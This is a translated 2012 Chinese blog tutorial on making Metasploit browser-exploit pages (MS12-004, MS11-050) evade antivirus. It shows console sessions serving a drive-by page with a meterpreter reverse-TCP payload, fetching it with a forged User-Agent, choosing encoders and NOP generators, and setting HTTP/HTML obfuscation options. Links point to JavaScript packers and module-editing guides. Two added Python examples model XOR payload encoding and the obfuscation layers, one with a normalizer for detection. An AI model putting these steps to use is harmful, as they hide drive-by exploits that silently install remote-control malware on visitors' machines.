
AV evasion for Metasploit browser exploit pages (网马)

Published: 2012-05-16 09:06  Source: Dis9  Author: brk

About web trojans

In recent years, planting trojans on web sites (挂马, drive-by downloads) has grown explosively in China, and decoding these pages has gradually gained attention.
A web trojan is a trojan implanted in a web page: opening the page runs the trojan, so you are infected without noticing anything.
A web trojan is really just an HTML page. What sets it apart from other pages is that an attacker has crafted it carefully; a user who merely visits it is infected.
Why "carefully crafted"? Because the script embedded in the page exploits a vulnerability in Internet Explorer so that IE silently downloads the trojan the attacker has hosted somewhere and runs (installs) it. In other words, the page both fetches the trojan to the local machine and executes it, entirely in the background: as soon as the user opens the page, the download and the execution (installation) start automatically.

About Metasploit

Metasploit bundles hundreds of browser exploits, and you can pair them with whatever shellcode you like, which makes penetration much simpler. But what if, in the middle of this, the target has a firewall or antivirus installed?
Like the picture below:

[Figure: the Metasploit exploit page being flagged on the target]


Making the exploit page evade AV

Take the latest one, the midiOutPlayNextPolyEvent heap overflow (MS12-004), and first generate a plain, unobfuscated page:

msf > use exploit/windows/browser/ms12_004_midi
msf exploit(ms12_004_midi) > show options

Module options (exploit/windows/browser/ms12_004_midi):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     5.5.5.1          yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms12_004_midi) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 5.5.5.1:4444
[*] Using URL: http://0.0.0.0:8080/qhvy86C7TNlbqQN
[*] Local IP: http://112.114.168.177:8080/qhvy86C7TNlbqQN
[*] Server started.
msf exploit(ms12_004_midi) >

Now let's fetch the page source (with a forged User-Agent) and see what this legendary web trojan looks like:

[email protected]:~$ wget -U "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)" http://112.114.168.177:8080/qhvy86C7TNlbqQN -O 1 | more 1
--2012-03-12 01:18:15-- http://112.114.168.177:8080/qhvy86C7TNlbqQN
Connecting to 112.114.168.177:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 35426 (35K) [text/html]
Saving to: '1'

100%[======================================>] 35,426 --.-K/s in 0s

2012-03-12 01:18:15 (213 MB/s) - '1' saved [35426/35426]

::::::::::::::
1
::::::::::::::

<html>
<head>
<script language='javascript'>
//
// JavaScript Heap Exploitation library
// by Alexander Sotirov <[email protected]>
//
// Version 0.3
//
// Copyright (c) 2007, Alexander Sotirov
// All rights reserved.
//
// The HeapLib library is licensed under a BSD license, the text of which follows:
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
// 1. Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// 2. Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
// 3. Neither the name of Alexander Sotirov nor the name of Determina Inc.
// may be used to endorse or promote products derived from this software
// without specific prior written permission.

Damn. It's all in plaintext, even the HeapLib banner and license. It would be a miracle if this weren't detected.

Evasion with ENCODER

Metasploit can emit shellcode as EXE, PHP, VBS, DLL and so on, and it offers AV-evasion features for those. Does that work for the exploit page too? It does.
First stop the running exploit job:

msf exploit(ms12_004_midi) > jobs

Jobs
====

Id Name
-- ----
0 Exploit: windows/browser/ms12_004_midi

msf exploit(ms12_004_midi) > kill 0
Stopping job: 0...

[*] Server stopped.
msf exploit(ms12_004_midi) >

Encode the page with ENCODER. The available choices are (only the x86/* encoders apply to the windows/meterpreter/reverse_tcp payload selected above; the rest target other architectures or payload types):

set ENCODER cmd/generic_sh
set ENCODER cmd/ifs
set ENCODER cmd/printf_php_mq
set ENCODER generic/none
set ENCODER mipsbe/longxor
set ENCODER mipsle/longxor
set ENCODER php/base64
set ENCODER ppc/longxor
set ENCODER ppc/longxor_tag
set ENCODER sparc/longxor_tag
set ENCODER x64/xor
set ENCODER x86/alpha_mixed
set ENCODER x86/alpha_upper
set ENCODER x86/avoid_utf8_tolower
set ENCODER x86/call4_dword_xor
set ENCODER x86/context_cpuid
set ENCODER x86/context_stat
set ENCODER x86/context_time
set ENCODER x86/countdown
set ENCODER x86/fnstenv_mov
set ENCODER x86/jmp_call_additive
set ENCODER x86/nonalpha
set ENCODER x86/nonupper
set ENCODER x86/shikata_ga_nai
set ENCODER x86/single_static_bit
set ENCODER x86/unicode_mixed
set ENCODER x86/unicode_upper

I'll go with x86/shikata_ga_nai:

msf exploit(ms12_004_midi) > set ENCODER x86/shikata_ga_nai
ENCODER => x86/shikata_ga_nai
msf exploit(ms12_004_midi) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 5.5.5.1:4444
[*] Using URL: http://0.0.0.0:8080/gNaH1Zi9e5
[*] Local IP: http://112.114.168.177:8080/gNaH1Zi9e5
[*] Server started.
msf exploit(ms12_004_midi) >
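What an encoder such as x86/shikata_ga_nai actually does to the payload bytes is easier to see in code. The following Python is an added example written for this page, not Metasploit code: it models the additive-feedback XOR scheme (XOR each 4-byte block with a running key, then add the decoded block into the key), picks a random key that keeps the encoded bytes free of a bad-character set, and shows that a byte signature taken from the raw payload no longer matches the encoded form. The sample payload, the 0x90 padding, the function names and the bad-character set are this example's assumptions. The real encoder additionally prepends an x86 decoder stub (an fnstenv-based GetPC plus the XOR/ADD loop), which is absent here and is itself a well-known signature, so encoding the payload alone is not evasion.

```python
"""Added example: model of the additive-feedback XOR encoding behind x86/shikata_ga_nai.

Not Metasploit code. Only the arithmetic the decoder loop performs on the payload is
modelled; the real encoder also prepends an x86 decoder stub (GetPC + loop), which
is absent here.
"""
import os
import struct

# Constructed sample "shellcode" containing NUL bytes, which most browser exploits cannot deliver.
SAMPLE = bytes.fromhex("fce8820000006089e531c0648b50308b520c8b52")
BADCHARS = b"\x00"          # assumption: the bad-character set the encoder must avoid


def _blocks(data: bytes):
    """Split into little-endian 4-byte words; pad with 0x90 (padding choice is this example's)."""
    data += b"\x90" * ((-len(data)) % 4)
    return [struct.unpack_from("<I", data, i)[0] for i in range(0, len(data), 4)]


def encode(payload: bytes, key: int) -> bytes:
    """enc_i = plain_i XOR key_i ; key_{i+1} = key_i + plain_i (mod 2^32)."""
    out = bytearray()
    for plain in _blocks(payload):
        out += struct.pack("<I", plain ^ key)
        key = (key + plain) & 0xFFFFFFFF
    return bytes(out)


def decode(blob: bytes, key: int) -> bytes:
    """What the decoder stub does: XOR the block back, then fold the decoded block into the key."""
    out = bytearray()
    for enc in _blocks(blob):
        plain = enc ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & 0xFFFFFFFF
    return bytes(out)


def encode_avoiding(payload: bytes, badchars: bytes, tries: int = 10000):
    """Pick a random key until neither the key bytes nor the encoded payload contain a bad char."""
    for _ in range(tries):
        key = struct.unpack("<I", os.urandom(4))[0]
        enc = encode(payload, key)
        if not any(b in badchars for b in struct.pack("<I", key) + enc):
            return key, enc
    raise RuntimeError("no usable key found; shrink the payload or the bad-character set")


def signature_hit(blob: bytes, signature: bytes) -> bool:
    """Naive static byte-signature match, the kind an AV engine applies to the raw payload."""
    return signature in blob


if __name__ == "__main__":
    key, enc = encode_avoiding(SAMPLE, BADCHARS)
    sig = SAMPLE[:8]
    print("key 0x%08x, encoded: %s" % (key, enc.hex()))
    print("signature on raw payload:", signature_hit(SAMPLE, sig))
    print("signature on encoded:    ", signature_hit(enc, sig))
    print("round trip ok:", decode(enc, key)[:len(SAMPLE)] == SAMPLE)
```

Every run yields a different key and therefore different encoded bytes, which is what defeats a signature on the payload; what stays constant from run to run is the decoder loop in front of it, which is why a polymorphic encoder still needs the page-level obfuscation described next.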

NOPs

A NOP sled is a run of 0x90 bytes, and a long run of 0x90 is an easy signature. Metasploit's NOP generators produce unpredictable sequences instead:

msf exploit(ms11_050_mshtml_cobjectelement) > show nops

NOP Generators
==============

   Name              Disclosure Date  Rank    Description
   ----              ---------------  ----    -----------
   armle/simple                       normal  Simple
   php/generic                        normal  PHP Nop Generator
   ppc/simple                         normal  Simple
   sparc/random                       normal  SPARC NOP generator
   tty/generic                        normal  TTY Nop Generator
   x64/simple                         normal  Simple
   x86/opty2                          normal  Opty2
   x86/single_byte                    normal  Single Byte

Evasion options

Now have a look at the module's evasion options:

msf exploit(ms11_050_mshtml_cobjectelement) > show evasion

Module evasion options:

Name : HTML::base64
Current Setting: double_pad
Description : Enable HTML obfuscation via an embeded base64 html object (IE not supported) (accepted: none, plain, single_pad, double_pad, random_space_injection)

Name : HTML::javascript::escape
Current Setting: 0
Description : Enable HTML obfuscation via HTML escaping (number of iterations)

Name : HTML::unicode
Current Setting: utf-32le
Description : Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)

Name : HTTP::chunked
Current Setting: false
Description : Enable chunking of HTTP responses via "Transfer-Encoding: chunked"

Name : HTTP::compression
Current Setting: none
Description : Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate)

Name : HTTP::header_folding
Current Setting: false
Description : Enable folding of HTTP headers

Name : HTTP::junk_headers
Current Setting: false
Description : Enable insertion of random junk HTTP headers

Name : HTTP::server_name
Current Setting: Apache
Description : Configures the Server header of all outgoing replies

Name : TCP::max_send_size
Current Setting: 0
Description : Maximum tcp segment size. (0 = disable)

Name : TCP::send_delay
Current Setting: 0
Description : Delays inserted before every send. (0 = disable)

msf exploit(ms11_050_mshtml_cobjectelement) >

These are straightforward: just set the ones you want.

Social-Engineer Toolkit

The Social-Engineer Toolkit (SET), written by David Kennedy (ReL1K), collects several useful social-engineering attack tools behind one simple interface. In essence it combines Metasploit browser exploits with web-page cloning and DNS spoofing. It needs a lot of dependencies installed; set it up yourself if you have the time.

Doing it by hand

After generating the exploit page, fetch it with wget using a forged User-Agent (as above) and then obfuscate the JavaScript by hand with an obfuscator or packer, for example:

http://www.daftlogic.com/projects-online-javascript-obfuscator.htm

http://javascriptcompressor.com

http://dean.edwards.name/weblog/2007/04/packer3

Or modify the module's source code directly; see:

http://funoverip.net/2011/04/100pc-anti-virus-evasion-with-metasploit-browser-exploits-from-ms11-003/
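To see what the evasion options listed above and the manual JavaScript packing do to the bytes on the wire, and why a scanner that matches signatures against raw HTTP traffic misses them, here is an added Python example written for this page (not Metasploit's own code). It models four of the layers: HTML::javascript::escape as an eval(unescape("...")) wrapper applied N times (the same wrapper stands in for the packers linked above), HTML::unicode utf-16le, HTTP::compression gzip and HTTP::chunked, and then a normalizer that peels them off in reverse order before matching a signature taken from the plaintext HeapLib banner seen earlier. The sample page, the signature string, the chunk size, the framing details and the function names are this example's assumptions; Metasploit's real implementations of these options differ in detail.

```python
"""Added example: model Metasploit's HTTP/HTML evasion layers and normalize them away.

Not Metasploit code. The wrapping formats are this example's own approximations of
HTML::javascript::escape, HTML::unicode, HTTP::compression and HTTP::chunked.
"""
import gzip
import re
import urllib.parse

# Constructed sample page: the plaintext HeapLib banner is what a scanner would key on.
SAMPLE_HTML = ("<html><head><script>// JavaScript Heap Exploitation library\n"
               "var heapLib = {};</script></head></html>")
SIGNATURE = b"JavaScript Heap Exploitation library"

_SCRIPT = re.compile(r"<script>(.*?)</script>", re.S)
_EVAL = re.compile(r'eval\(unescape\("([^"]*)"\)\)')


def js_escape(html: str, iterations: int) -> str:
    """HTML::javascript::escape model: percent-escape every <script> body and wrap it in
    eval(unescape("...")); each iteration nests another layer."""
    def wrap(m):
        return '<script>eval(unescape("%s"))</script>' % urllib.parse.quote(m.group(1), safe="")
    for _ in range(iterations):
        html = _SCRIPT.sub(wrap, html)
    return html


def _chunk(data: bytes, size: int) -> bytes:
    """HTTP::chunked model: Transfer-Encoding: chunked framing with a fixed chunk size."""
    out = bytearray()
    for i in range(0, len(data), size):
        piece = data[i:i + size]
        out += b"%x\r\n" % len(piece) + piece + b"\r\n"
    return bytes(out + b"0\r\n\r\n")


def _dechunk(data: bytes) -> bytes:
    """Reassemble a chunked body; stops at the zero-length terminating chunk."""
    out = bytearray()
    pos = 0
    while True:
        end = data.index(b"\r\n", pos)
        size = int(data[pos:end], 16)
        if size == 0:
            return bytes(out)
        pos = end + 2
        out += data[pos:pos + size]
        pos += size + 2


def build_response(html, js_iterations=0, unicode="none", compression="none",
                   chunked=False, server="Apache") -> bytes:
    """Assemble the raw HTTP response the exploit server would send with these options."""
    text = js_escape(html, js_iterations)
    content_type = "text/html"
    if unicode == "utf-16le":                      # HTML::unicode utf-16le model: BOM + UTF-16LE body
        body = b"\xff\xfe" + text.encode("utf-16-le")
        content_type = "text/html; charset=utf-16"
    else:
        body = text.encode("utf-8")
    headers = [("Server", server), ("Content-Type", content_type)]   # HTTP::server_name
    if compression == "gzip":                      # HTTP::compression gzip
        body = gzip.compress(body)
        headers.append(("Content-Encoding", "gzip"))
    if chunked:                                    # HTTP::chunked
        headers.append(("Transfer-Encoding", "chunked"))
        body = _chunk(body, 37)                    # chunk size is arbitrary
    else:
        headers.append(("Content-Length", str(len(body))))
    head = "HTTP/1.1 200 OK\r\n" + "".join("%s: %s\r\n" % h for h in headers) + "\r\n"
    return head.encode("ascii") + body


def normalize(raw: bytes) -> str:
    """Detection side: undo chunking, compression, unicode and eval/unescape wrappers."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        k, _, v = line.partition(b":")
        headers[k.strip().lower()] = v.strip()
    if headers.get(b"transfer-encoding") == b"chunked":
        body = _dechunk(body)
    if headers.get(b"content-encoding") == b"gzip":
        body = gzip.decompress(body)
    if body.startswith(b"\xff\xfe"):
        text = body[2:].decode("utf-16-le")
    elif body.startswith(b"\xfe\xff"):
        text = body[2:].decode("utf-16-be")
    else:
        text = body.decode("utf-8", "replace")
    while True:                                    # peel nested eval(unescape("...")) wrappers
        peeled = _EVAL.sub(lambda m: urllib.parse.unquote(m.group(1)), text)
        if peeled == text:
            return text
        text = peeled


def signature_hit(data, signature) -> bool:
    """Naive static match; works on raw bytes or on normalized text."""
    return signature in data


if __name__ == "__main__":
    plain = build_response(SAMPLE_HTML)
    evaded = build_response(SAMPLE_HTML, js_iterations=2, unicode="utf-16le",
                            compression="gzip", chunked=True)
    print("raw match, plain page:  ", signature_hit(plain, SIGNATURE))
    print("raw match, evaded page: ", signature_hit(evaded, SIGNATURE))
    print("match after normalize:  ", signature_hit(normalize(evaded), SIGNATURE.decode()))
```

The point on the defensive side is that each of these options only moves the page out of reach of a scanner that never reassembles the response; a proxy or IDS that de-chunks, decompresses, decodes the charset and statically unwraps eval(unescape()) sees the same HeapLib banner the wget capture above shows. A real packer such as Dean Edwards' p,a,c,k,e,d needs a JavaScript interpreter or a sandboxed browser to unwrap rather than a regex, but the layering logic is the same.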
